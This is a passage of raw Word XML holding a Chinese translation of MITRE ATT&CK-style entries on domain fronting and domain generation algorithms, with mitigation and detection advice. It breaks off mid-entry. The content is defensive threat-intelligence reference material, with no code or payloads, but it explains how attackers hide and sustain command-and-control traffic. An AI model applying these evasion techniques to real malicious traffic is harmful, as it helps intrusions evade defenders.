          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>Host</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段匹配（如果忽略了留空的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SNI</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段），数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>仍可</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最终</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>到达目的地</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1704A8CC" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="003D0094">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>例如，如果域</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-x</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和域</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>属于同一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则可以将域</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-x</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头中，将域</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头中。数据看起来将流向域</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-x</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会将其路由到域</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CC59BA" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="003D0094">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2826"/>
        <w:gridCol w:w="6910"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D0094" w:rsidRPr="003D0094" w14:paraId="4FB4B061" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="429AF037" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="003D0094" w:rsidRDefault="003D0094" w:rsidP="003D0094">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D0094">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6910" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4CFE37EF" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="003D0094" w:rsidRDefault="003D0094" w:rsidP="003D0094">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D0094">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0094" w:rsidRPr="00A65911" w14:paraId="60E014EA" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="1276"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2826" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61DF49EF" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>执行预防</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E2447B7" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>为了使用域名前置技术，攻击者可能需要部署一些</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>额外的</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>工具到入侵的系统。可</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用白名单来防止攻击者安装这些工具。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0094" w:rsidRPr="00A65911" w14:paraId="04FAABF0" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2826" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F8F4242" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId238" w:history="1">
              <w:r w:rsidR="003D0094" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>SSL/TLS</w:t>
              </w:r>
              <w:r w:rsidR="003D0094" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>检查</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05ED8B03" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果可以检查</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HTTPS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量，则可以分析抓包内容</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>来</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>是否有域名前置</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>相关的连接</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FA2D25B" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="003D0094">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="446CC16E" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="003D0094">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4560AB" w14:textId="77777777" w:rsidR="003D0094" w:rsidRPr="00A65911" w:rsidRDefault="003D0094" w:rsidP="003D0094">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查已</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>就绪</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或数据未</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>加密</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则可以检查</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>ost</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段是否与</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTPS SNI</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>匹配或检查</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>其</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否与域名黑名单或白名单对应。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3125BBC5" w14:textId="48A7071A" w:rsidR="005A7C85" w:rsidRPr="00A65911" w:rsidRDefault="00A0413E" w:rsidP="005A7C85">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>域</w:t>
      </w:r>
      <w:r w:rsidR="005A7C85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>生成算法</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A7C85" w:rsidRPr="00A65911" w14:paraId="24942B8D" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FA135C2" w14:textId="77777777" w:rsidR="005A7C85" w:rsidRPr="00A65911" w:rsidRDefault="005A7C85" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1483</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36980801" w14:textId="0BED83B1" w:rsidR="005A7C85" w:rsidRPr="00A65911" w:rsidRDefault="005A7C85" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0177CE82" w14:textId="77777777" w:rsidR="005A7C85" w:rsidRPr="00A65911" w:rsidRDefault="005A7C85" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C39F0EB" w14:textId="77777777" w:rsidR="005A7C85" w:rsidRPr="00A65911" w:rsidRDefault="005A7C85" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05DC6136" w14:textId="77777777" w:rsidR="005A7C85" w:rsidRPr="00A65911" w:rsidRDefault="005A7C85" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：网络进程使用，网络抓包，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>设备日志，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术网络流分析，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>DNS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>记录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7289FA9A" w14:textId="77777777" w:rsidR="005A7C85" w:rsidRPr="00A65911" w:rsidRDefault="005A7C85" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Sylvain Gil</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Exabeam</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Barry Shteiman</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Exabeam</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Ryan Benson</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Exabeam</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="325FE9AC" w14:textId="77777777" w:rsidR="005A7C85" w:rsidRPr="00A65911" w:rsidRDefault="005A7C85" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63577F4F" w14:textId="77777777" w:rsidR="005A7C85" w:rsidRPr="00A65911" w:rsidRDefault="005A7C85" w:rsidP="005A7C85">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EBBF7A8" w14:textId="3EAE987E" w:rsidR="005A7C85" w:rsidRPr="00A65911" w:rsidRDefault="005A7C85" w:rsidP="005A7C85">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会利用域名生成算法（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DGA</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来动态识别</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>&amp;C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流量的目的地，而不是依赖于静态</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址或域的列表。这样做的好处是，防御程序很难阻止、跟踪或接管</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通道，因为恶意软件可能会检查成千上万个域以等待</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>指示</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C18A877" w14:textId="77777777" w:rsidR="005A7C85" w:rsidRPr="00A65911" w:rsidRDefault="005A7C85" w:rsidP="005A7C85">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>GA</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>算法通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>生成每个字母来构造域名时，可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采用看似随机或“莫名其妙的”字符串（例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>istgmxdejdnxuyla.ru</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。或者，某些</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DGA</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>算法使用完整的单词作为单位，将单词（而不是字母）连接在一起（例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cityjulydish.net</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>许多</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DGA</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>算法基于时间，在每个时间段（每小时，每天，每月等）生成一个不同的域名。另一些则还包含种子值，使得防御程序更难预测未来的域名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5903E586" w14:textId="2F47D064" w:rsidR="005A7C85" w:rsidRPr="00A65911" w:rsidRDefault="005A7C85" w:rsidP="005A7C85">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="scite-citeref-number"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>攻击者可能出于失败回退渠道的目的而使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DGA</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>算法。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当失去与主要</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>&amp;C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器的联系时，恶意软件可能会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DGA</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>算法来重新建立</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05892F1C" w14:textId="77777777" w:rsidR="005A7C85" w:rsidRPr="00A65911" w:rsidRDefault="005A7C85" w:rsidP="005A7C85">
      <w:pPr>
